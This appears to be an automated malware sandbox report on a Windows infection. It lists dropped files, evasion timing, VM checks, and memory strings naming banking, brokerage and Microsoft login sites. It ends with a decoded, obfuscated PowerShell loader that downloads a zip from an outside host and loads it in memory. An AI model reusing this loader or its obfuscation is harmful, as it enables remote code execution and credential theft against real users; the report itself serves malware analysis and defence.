                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-O945R.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-JPD1F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\aaHMLib_x64.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5ScriptTools.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\HalUninstall.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-8FE4M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BUBHC.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\DiskMediaTypeLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-HNNQ8.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-BAEH3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-I791C.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-IECK1.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DF4GF.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\System.Net.Http.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MJJQ3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-7QIOU.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\CPUManufacturerCmdLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\msvcp140d.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-1MK9F.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PSF4N.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MOT2M.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\VideoMemoryLib.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-Q1AT3.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qtgraphicaleffectsprivate.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-RLSFG.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-QCTRS.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Script.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-G5QCH.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DK0J4.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-MQD1U.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-E63PO.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\cpuidsdk64.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Gui.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-KG79P.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\FanProfile.exe (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-ECL6Q.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-URGPI.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\vcruntime140_1.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-PDJ8O.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\Qt5Widgets.dll (copy)Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-DDTGT.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-45OJH.tmp\_isetup\_setup64.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\is-UDQ9J.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-TDMOB.tmp\qsqlite.dll (copy)Jump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com TID: 5508Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.com TID: 548Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 3463 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep count: 6354 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\650429\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\650429Jump to behavior
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696584680t
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:T
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000002.2428703154.0000000001059000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+=
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
                Source: powershell.exe, 00000021.00000002.2377774305.0000000008724000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA(
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696584680s
                Source: Palestine.com, 00000011.00000002.2036575036.0000000004760000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000002.2032778211.0000000001CD3000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2389704146.0000000001610000.00000004.00000020.00020000.00000000.sdmp, Palestine.com, 0000001F.00000002.2399867318.00000000042AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000002.2077631892.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y+
                Source: powershell.exe, 00000021.00000002.2368278483.0000000008603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: powershell.exe, 00000021.00000002.2377256586.0000000008719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD0
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696584680x
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696584680t
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000002.2428703154.0000000001059000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                Source: powershell.exe, 00000021.00000002.2244510007.0000000002E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004456000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696584680p
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696584680o
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696584680f
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696584680
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
                Source: powershell.exe, 00000021.00000002.2377256586.0000000008719000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&0m
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696584680j
                Source: Palestine.com, 0000001F.00000003.1882392905.0000000004451000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: Base64 decoded .((GET-vaRIABLe '*Mdr*').naMe[3,11,2]-joIn'') ((('SEt-vaRIaBle (6Sv8ma6Sv+6SvFZ6Sv) ( [TYp'+'E](6Sv{2}{0}{3}{4}{1}6Sv-FlTVelTV,lT'+'VINlTV,lTVSy'+'STlTV,lTVm.iolTV,lTV.SeEKoRIGlTV)); sEt-ITeM Variable:8APc ( [Type](6Sv{1}{2}{0}'+'6Sv -F lTVDlTV,lTVSYslTV,lTVtEM.gU'+'IlT'+'V) ) ; sV cg0'+'q ( [tYPe](6Sv{3}{0}{1}{4}{2}6Sv -FlTVteM.iO'+'lTV,lTV.PlTV,lTVhlTV,lTVSYSlTV,lTVAT'+'lTV))'+' ; Set-Vari'+'able -Name uB2gt -Value ([TYPe](6Sv{1}{2}{0}{3}6Sv -f lTVEm.I'+'O.FlTV,lTVSylTV,lTVSTlTV,lTVILElTV)) ; Set-Variable -Name scRIPTBLOCk -Value ({ '+' Set-Variable -Name ZIPURl -Value (6Sv{3}{7}{6}{4}{9}{1}{10}{8}{0}{5}{2}6Sv -flTVtl'+'TV,lTVp/l'+'TV,lTVtxtlTV,lTVhtlTV,lTViptedelTV,lTV_clp_pan.lTV,lTVs://kllTV,lTVtplTV,lTVnlTV,lTVhoa.sh'+'olTV,lTVilTV) Set-Variable -Name wEBclIENt -Value (.(6Sv{1}{2}{0}6Sv -flTVjectlTV,lTVNewlTV,lTV-OblTV) (6Sv{1}{0}{2}{3}6Sv-f lTVet.WlTV,lTVSys'+'tem.NlTV,lTVelTV,lTV'+'bClientlTV))'+' Set-Variab'+'le -Name ZiPdatA -Value'+' (DyE{weBUmBCLBUmIEnT}.(6Sv{3}{1}{0}{2}6Sv -flTVatlTV,lTVadDlTV,lTValTV,lTVDownlolTV).Invoke('+'DyE{zBUmIPBUmUrl})'+') '+' Set-Variable -Name MEMoRy'+'STrEAm -Value (&(6Sv{2}{1}{0}6Sv-f lTVec'+'tlTV,lTVObjlTV,lTVNew-lTV) (6Sv{2}{3}{1}'+'{0}6Sv-f lTV'+'amlTV,lTVStrelTV,lTVSyslTV,lTVtem.IO.MemorylTV)) DyE{MemBUmorySTrBUmeam}.(6Sv{0}{1}6Sv -flTVWlTV,l'+'TVritelTV).Invo'+'ke(DyE{ZIBUmpDaTA}, 0, DyE{ZiPBUmDBUmAta}.6SvlenGBUmTH6Sv) DyE{mEmORBUmYBUmStBUmREBUmAM}.6SvsB'+'UmEe'+'k6Sv(0, (VARIABLE (6Sv8mA6Sv+6S
